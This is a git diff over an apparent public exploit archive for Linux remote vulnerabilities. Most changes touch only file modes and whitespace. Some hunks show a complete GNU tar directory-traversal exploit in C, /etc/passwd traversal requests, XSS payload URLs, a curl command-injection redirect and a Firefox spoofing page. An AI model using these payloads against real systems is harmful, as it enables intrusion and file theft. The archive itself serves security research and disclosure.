--git a/platforms/linux/remote/279.c b/platforms/linux/remote/279.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27902.txt b/platforms/linux/remote/27902.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/27987.html b/platforms/linux/remote/27987.html old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/28181.c b/platforms/linux/remote/28181.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/282.c b/platforms/linux/remote/282.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/28314.c b/platforms/linux/remote/28314.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/28398.txt b/platforms/linux/remote/28398.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/284.c b/platforms/linux/remote/284.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/28424.txt b/platforms/linux/remote/28424.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/2856.pm b/platforms/linux/remote/2856.pm old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/2858.c b/platforms/linux/remote/2858.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/28595.txt b/platforms/linux/remote/28595.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29033.html b/platforms/linux/remote/29033.html old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/291.c b/platforms/linux/remote/291.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29160.c b/platforms/linux/remote/29160.c old mode 100755 new mode 100644 index 2c7da3f38..7abc614e2 --- a/platforms/linux/remote/29160.c +++ b/platforms/linux/remote/29160.c @@ -1,27 +1,29 @@ +/* source: http://www.securityfocus.com/bid/21235/info GNU Tar is prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. These issues present themselves when the application processes malicious archives. A successful attack can allow the attacker to place potentially malicious files and overwrite files on a computer in the context of the user running the affected application. Successful exploits may aid in further attacks. +*/ - /* - * tarxyz.c - GNU tar directory traversal exploit. - * Written by Teemu Salmela. - * - * Example usage (creates a tar file that extracts /home/teemu/.bashrc): - * $ gcc -o tarxyz tarxyz.c - * $ ./tarxyz > ~/xyz.tar - * $ mkdir -p /tmp/xyz/home/teemu/ - * $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc - * $ cd /tmp - * $ tar -rf ~/xyz.tar xyz/home/teemu - */ +/* + * tarxyz.c - GNU tar directory traversal exploit. + * Written by Teemu Salmela. + * + * Example usage (creates a tar file that extracts /home/teemu/.bashrc): + * $ gcc -o tarxyz tarxyz.c + * $ ./tarxyz > ~/xyz.tar + * $ mkdir -p /tmp/xyz/home/teemu/ + * $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc + * $ cd /tmp + * $ tar -rf ~/xyz.tar xyz/home/teemu + */ - #include <string.h> - #include <stdio.h> - #include <stdlib.h> +#include <string.h> +#include <stdio.h> +#include <stdlib.h> - struct posix_header +struct posix_header { /* byte offset */ char name[100]; /* 0 */ char mode[8]; /* 100 */ @@ -40,21 +42,20 @@ A successful attack can allow the attacker to place potentially malicious files char devminor[8]; /* 337 */ char prefix[155]; /* 345 */ /* 500 */ - }; +}; - #define GNUTYPE_NAMES 'N' +#define GNUTYPE_NAMES 'N' - #define BLOCKSIZE 512 +#define BLOCKSIZE 512 - union block - { +union block +{ char buffer[BLOCKSIZE]; struct posix_header header; - }; +}; - void - data(void *p, size_t size) - { +void data(void *p, size_t size) +{ size_t n = 0; char b[BLOCKSIZE]; @@ -67,11 +68,10 @@ A successful attack can allow the attacker to place potentially malicious files memcpy(b, &((char *)p)[n], size - n); fwrite(b, 1, sizeof(b), stdout); } - } +} - int - main(int argc, char *argv[]) - { +int main(int argc, char *argv[]) +{ char *link_name = "xyz"; union block b; char *d; @@ -102,4 +102,4 @@ A successful attack can allow the attacker to place potentially malicious files sprintf(b.header.chksum, "%06o ", cksum); fwrite(&b, 1, sizeof(b), stdout); data(d, strlen(d)); - } \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/remote/29302.txt b/platforms/linux/remote/29302.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/2933.c b/platforms/linux/remote/2933.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29383.txt b/platforms/linux/remote/29383.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29471.txt b/platforms/linux/remote/29471.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29496.txt b/platforms/linux/remote/29496.txt old mode 100755 new mode 100644 index e56631b69..a91c0775f --- a/platforms/linux/remote/29496.txt +++ b/platforms/linux/remote/29496.txt @@ -4,4 +4,4 @@ ArsDigita Community System is prone to a directory-traversal vulnerability becau An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks. -http://www.example.com/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd \ No newline at end of file +http://www.example.com/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/2959.sql b/platforms/linux/remote/2959.sql old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29595.txt b/platforms/linux/remote/29595.txt old mode 100755 new mode 100644 index d1ebc6849..35d9d0967 --- a/platforms/linux/remote/29595.txt +++ b/platforms/linux/remote/29595.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to retrieve the contents of arbitrary Versions prior to 0.2.1 are vulnerable to this issue. -http://www.example.com/prb/www/?p=../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/prb/www/?p=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/296.c b/platforms/linux/remote/296.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29706.txt b/platforms/linux/remote/29706.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29734.txt b/platforms/linux/remote/29734.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29739.txt b/platforms/linux/remote/29739.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29753.c b/platforms/linux/remote/29753.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29768.txt b/platforms/linux/remote/29768.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29769.txt b/platforms/linux/remote/29769.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29770.txt b/platforms/linux/remote/29770.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/29932.txt b/platforms/linux/remote/29932.txt old mode 100755 new mode 100644 index 345712bc5..2c7802997 --- a/platforms/linux/remote/29932.txt +++ b/platforms/linux/remote/29932.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to steal cookie-based authentication creden Red Hat Directory Server 7.1 is reported vulnerable; other versions may also be affected. -http://example.com:8001/clients/dsgw/bin/search?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/search?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://example.com:8001/clients/dsgw/bin/lang?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/lang?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://example.com:8001/clients/dsgw/bin/csearch?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/csearch?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://example.com:8001/clients/dsgw/bin/newentry?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/newentry?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file +http://example.com:8001/clients/dsgw/bin/search?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/search?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://example.com:8001/clients/dsgw/bin/lang?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/lang?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://example.com:8001/clients/dsgw/bin/csearch?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/csearch?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http://example.com:8001/clients/dsgw/bin/newentry?context=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://example.com:8001/clients/dsgw/bin/newentry?context=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/linux/remote/30043.txt b/platforms/linux/remote/30043.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30074.txt b/platforms/linux/remote/30074.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30089.txt b/platforms/linux/remote/30089.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30142.txt b/platforms/linux/remote/30142.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30186.txt b/platforms/linux/remote/30186.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3021.txt b/platforms/linux/remote/3021.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30284.vbs b/platforms/linux/remote/30284.vbs old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30285.txt b/platforms/linux/remote/30285.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30286.txt b/platforms/linux/remote/30286.txt old mode 100755 new mode 100644 index dd7c6c2aa..2f803ecce --- a/platforms/linux/remote/30286.txt +++ b/platforms/linux/remote/30286.txt @@ -6,4 +6,4 @@ Attackers may exploit this issue to access files that may contain sensitive info UPDATE (December 24, 2007): According to the vendor, this issue was addressed in ImgSvr 0.6.21. However, reports indicate that this version is still vulnerable. -GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0 \ No newline at end of file +GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0 \ No newline at end of file diff --git a/platforms/linux/remote/30291.txt b/platforms/linux/remote/30291.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30319.c b/platforms/linux/remote/30319.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/304.c b/platforms/linux/remote/304.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30439.txt b/platforms/linux/remote/30439.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30454.txt b/platforms/linux/remote/30454.txt old mode 100755 new mode 100644 index 71a81e8b1..155a1f867 --- a/platforms/linux/remote/30454.txt +++ b/platforms/linux/remote/30454.txt @@ -36,4 +36,4 @@ Adonis 5.0.2.8 is vulnerable; other versions may also be affected. Many attack variations are possible, such as changing system startup scripts to modify the iptables configuration on the - appliance. \ No newline at end of file + appliance. \ No newline at end of file diff --git a/platforms/linux/remote/30543.txt b/platforms/linux/remote/30543.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30677.pl b/platforms/linux/remote/30677.pl index ceec9c2b0..e1b060187 100755 --- a/platforms/linux/remote/30677.pl +++ b/platforms/linux/remote/30677.pl @@ -132,4 +132,4 @@ Content-Length: $sdplen\r \r $sdp"; -$socket->send($msg); \ No newline at end of file +$socket->send($msg); \ No newline at end of file diff --git a/platforms/linux/remote/30711.txt b/platforms/linux/remote/30711.txt old mode 100755 new mode 100644 index 81d6e4750..8537e479e --- a/platforms/linux/remote/30711.txt +++ b/platforms/linux/remote/30711.txt @@ -23,4 +23,4 @@ Content-Type: text/plain Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT Server: Shttp/ServerKit Date: Thu, 25 Oct 2007 16:42:32 GMT -Connection: close \ No newline at end of file +Connection: close \ No newline at end of file diff --git a/platforms/linux/remote/30728.txt b/platforms/linux/remote/30728.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30736.txt b/platforms/linux/remote/30736.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/308.c b/platforms/linux/remote/308.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30907.txt b/platforms/linux/remote/30907.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/30971.txt b/platforms/linux/remote/30971.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3099.pm b/platforms/linux/remote/3099.pm old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/31051.txt b/platforms/linux/remote/31051.txt old mode 100755 new mode 100644 index bb1c661ec..48bde03a3 --- a/platforms/linux/remote/31051.txt +++ b/platforms/linux/remote/31051.txt @@ -8,4 +8,4 @@ Firefox 2.0.0.11 is vulnerable; other versions may also be affected. NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging. -<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script> \ No newline at end of file +<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script> \ No newline at end of file diff --git a/platforms/linux/remote/31052.java b/platforms/linux/remote/31052.java old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/31076.py b/platforms/linux/remote/31076.py index c2d4c5f8f..f7ae5f1ff 100755 --- a/platforms/linux/remote/31076.py +++ b/platforms/linux/remote/31076.py @@ -54,6 +54,4 @@ except Exception, e: print "[+] Usage: python mplayer_poc.py filename.mov windows (For WinXP Prof SP2 ES)" print " python mplayer_poc.py filename.mov linux (For -Linux Gentoo)" - - \ No newline at end of file +Linux Gentoo)" \ No newline at end of file diff --git a/platforms/linux/remote/31127.txt b/platforms/linux/remote/31127.txt old mode 100755 new mode 100644 index f01a62b85..9a2089091 --- a/platforms/linux/remote/31127.txt +++ b/platforms/linux/remote/31127.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to obtain potentially sensitive information tha Firefox 2.0.0.12 and prior versions are vulnerable. -<script> /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x000000.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '<br />'); }; </script> <script src="view-source:resource:///greprefs/all.js"></script> \ No newline at end of file +<script> /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x000000.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '<br />'); }; </script> <script src="view-source:resource:///greprefs/all.js"></script> \ No newline at end of file diff --git a/platforms/linux/remote/31309.c b/platforms/linux/remote/31309.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/31396.txt b/platforms/linux/remote/31396.txt old mode 100755 new mode 100644 index c12192ae5..9c50e72ed --- a/platforms/linux/remote/31396.txt +++ b/platforms/linux/remote/31396.txt @@ -6,4 +6,4 @@ Information obtained may aid in further attacks. This issue affects lighttpd 1.4.18; other versions may also be vulnerable. -http://www.example.com/~nobody/etc/passwd \ No newline at end of file +http://www.example.com/~nobody/etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/31462.c b/platforms/linux/remote/31462.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/31540.php b/platforms/linux/remote/31540.php old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/31591.txt b/platforms/linux/remote/31591.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/31630.txt b/platforms/linux/remote/31630.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/31887.txt b/platforms/linux/remote/31887.txt old mode 100755 new mode 100644 index cb333be61..97392ffde --- a/platforms/linux/remote/31887.txt +++ b/platforms/linux/remote/31887.txt @@ -11,4 +11,4 @@ Response to LIST (backslash): \..\..\..\..\..\..\..\..\..\testfile.txt\r\n Response to LIST (forward-slash): -/../../../../../../../../../testfile.txt\r\n \ No newline at end of file +/../../../../../../../../../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/linux/remote/31903.asm b/platforms/linux/remote/31903.asm old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32012.txt b/platforms/linux/remote/32012.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32133.txt b/platforms/linux/remote/32133.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32165.txt b/platforms/linux/remote/32165.txt old mode 100755 new mode 100644 index de6e73c50..f56396717 --- a/platforms/linux/remote/32165.txt +++ b/platforms/linux/remote/32165.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br XAMPP 1.6.7 for Linux is vulnerable; other versions may also be affected. -http://www.example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script> \ No newline at end of file +http://www.example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script> \ No newline at end of file diff --git a/platforms/linux/remote/32166.txt b/platforms/linux/remote/32166.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32225.txt b/platforms/linux/remote/32225.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32228.xml b/platforms/linux/remote/32228.xml old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32286.txt b/platforms/linux/remote/32286.txt old mode 100755 new mode 100644 index eb76554a6..333900817 --- a/platforms/linux/remote/32286.txt +++ b/platforms/linux/remote/32286.txt @@ -10,4 +10,4 @@ Web-Based Admin View 2.1.2 is vulnerable; other versions may also be affected. The following example is available: GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0 -Host: www.example.com:8081 \ No newline at end of file +Host: www.example.com:8081 \ No newline at end of file diff --git a/platforms/linux/remote/32289.txt b/platforms/linux/remote/32289.txt old mode 100755 new mode 100644 index a087145a4..ca7b8a7c2 --- a/platforms/linux/remote/32289.txt +++ b/platforms/linux/remote/32289.txt @@ -20,4 +20,4 @@ Place your cursor on ``date'' and press K. File ``pwned'' is created in the current working directory. Please note: If modeline processing is disabled, set the 'iskeyword' -option manually. \ No newline at end of file +option manually. \ No newline at end of file diff --git a/platforms/linux/remote/32303.txt b/platforms/linux/remote/32303.txt old mode 100755 new mode 100644 index 870f7c589..a810b8d78 --- a/platforms/linux/remote/32303.txt +++ b/platforms/linux/remote/32303.txt @@ -6,4 +6,4 @@ By inserting arbitrary headers into an HTTP response, attackers may be able to l This issue affects Mono 2.0 and earlier. -<script runat="server"> void Page_Load(object o, EventArgs e) { // Query parameter text is not checked before saving in user cookie NameValueCollection request = Request.QueryString; // Adding cookies to the response Response.Cookies["userName"].Value = request["text"]; } </script> \ No newline at end of file +<script runat="server"> void Page_Load(object o, EventArgs e) { // Query parameter text is not checked before saving in user cookie NameValueCollection request = Request.QueryString; // Adding cookies to the response Response.Cookies["userName"].Value = request["text"]; } </script> \ No newline at end of file diff --git a/platforms/linux/remote/32445.txt b/platforms/linux/remote/32445.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32530.txt b/platforms/linux/remote/32530.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32548.html b/platforms/linux/remote/32548.html old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32690.txt b/platforms/linux/remote/32690.txt old mode 100755 new mode 100644 index 852b0ac52..446a96f1d --- a/platforms/linux/remote/32690.txt +++ b/platforms/linux/remote/32690.txt @@ -9,4 +9,4 @@ The issue affects xterm with patch 237; other versions may also be affected. The following example is available: perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log -cat bla.log \ No newline at end of file +cat bla.log \ No newline at end of file diff --git a/platforms/linux/remote/32691.txt b/platforms/linux/remote/32691.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32796.txt b/platforms/linux/remote/32796.txt old mode 100755 new mode 100644 index 2f9cce9fa..a92452150 --- a/platforms/linux/remote/32796.txt +++ b/platforms/linux/remote/32796.txt @@ -4,4 +4,4 @@ Swann DVR4 SecuraNet is prone to a directory-traversal vulnerability because it Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. -http://www.example.com/../../var/run/vy_netman.cfg \ No newline at end of file +http://www.example.com/../../var/run/vy_netman.cfg \ No newline at end of file diff --git a/platforms/linux/remote/32825.txt b/platforms/linux/remote/32825.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32834.txt b/platforms/linux/remote/32834.txt old mode 100755 new mode 100644 index 7a3ae5e8d..f772d6702 --- a/platforms/linux/remote/32834.txt +++ b/platforms/linux/remote/32834.txt @@ -7,4 +7,4 @@ Remote attackers can exploit this issue to bypass certain security restrictions This issue affects cURL/libcURL 5.11 through 7.19.3. Other versions may also be vulnerable. The following example redirection request may be used to carry out this attack: -Location: scp://name:passwd@host/a'``;date >/tmp/test``;' \ No newline at end of file +Location: scp://name:passwd@host/a'``;date >/tmp/test``;' \ No newline at end of file diff --git a/platforms/linux/remote/32837.py b/platforms/linux/remote/32837.py index 8e4461a88..0120c828f 100755 --- a/platforms/linux/remote/32837.py +++ b/platforms/linux/remote/32837.py @@ -10,4 +10,4 @@ Versions prior to Wesnoth 1.5.11 are affected. import threading os = threading._sys.modules['os'] f = os.popen("firefox 'http://www.example.com'") -f.close() \ No newline at end of file +f.close() \ No newline at end of file diff --git a/platforms/linux/remote/32929.txt b/platforms/linux/remote/32929.txt old mode 100755 new mode 100644 index 34dfc2bfa..d427c2e75 --- a/platforms/linux/remote/32929.txt +++ b/platforms/linux/remote/32929.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Stronghold 2.3 is vulnerable; other versions may also be affected. -http://www.example.com/<script>alert("lol");</script> http://www.example.com/<script>window.location="http://www.google.com"</script> http://www.example.com/<body bgcolor="black"><font color="green"> \ No newline at end of file +http://www.example.com/<script>alert("lol");</script> http://www.example.com/<script>window.location="http://www.google.com"</script> http://www.example.com/<body bgcolor="black"><font color="green"> \ No newline at end of file diff --git a/platforms/linux/remote/32942.txt b/platforms/linux/remote/32942.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/32965.c b/platforms/linux/remote/32965.c old mode 100755 new mode 100644 index 41b8f3c73..3948741c7 --- a/platforms/linux/remote/32965.c +++ b/platforms/linux/remote/32965.c @@ -68,6 +68,4 @@ main (void) gnutls_global_deinit (); return 0; -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/remote/33.c b/platforms/linux/remote/33.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33032.txt b/platforms/linux/remote/33032.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33034.txt b/platforms/linux/remote/33034.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33039.txt b/platforms/linux/remote/33039.txt old mode 100755 new mode 100644 index 4734a256a..eb180dce4 --- a/platforms/linux/remote/33039.txt +++ b/platforms/linux/remote/33039.txt @@ -16,4 +16,4 @@ The following example URI is available: https://www.example.xn--com-edoaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example2.org/ -This URI would be decoded as 'www.example.com' followed by multiple 'U+115a' characters and '.example2.org'. \ No newline at end of file +This URI would be decoded as 'www.example.com' followed by multiple 'U+115a' characters and '.example2.org'. \ No newline at end of file diff --git a/platforms/linux/remote/33053.txt b/platforms/linux/remote/33053.txt old mode 100755 new mode 100644 index 064fa4b57..880e9227b --- a/platforms/linux/remote/33053.txt +++ b/platforms/linux/remote/33053.txt @@ -8,4 +8,4 @@ Samba 3.0.31 through 3.3.5 are affected. The following proof of concept is available: -smb: \> put aa%3Fbb \ No newline at end of file +smb: \> put aa%3Fbb \ No newline at end of file diff --git a/platforms/linux/remote/33103.html b/platforms/linux/remote/33103.html old mode 100755 new mode 100644 index a0d4107aa..1c40b0ea5 --- a/platforms/linux/remote/33103.html +++ b/platforms/linux/remote/33103.html @@ -6,4 +6,4 @@ An attacker may leverage this issue by inserting arbitrary content to spoof a UR This issue affects Firefox versions prior to 3.5.2 and 3.0.13. -</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a = window.open("http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian \ No newline at end of file +</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a = window.open("http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian \ No newline at end of file diff --git a/platforms/linux/remote/3329.c b/platforms/linux/remote/3329.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33311.txt b/platforms/linux/remote/33311.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33313.txt b/platforms/linux/remote/33313.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33315.java 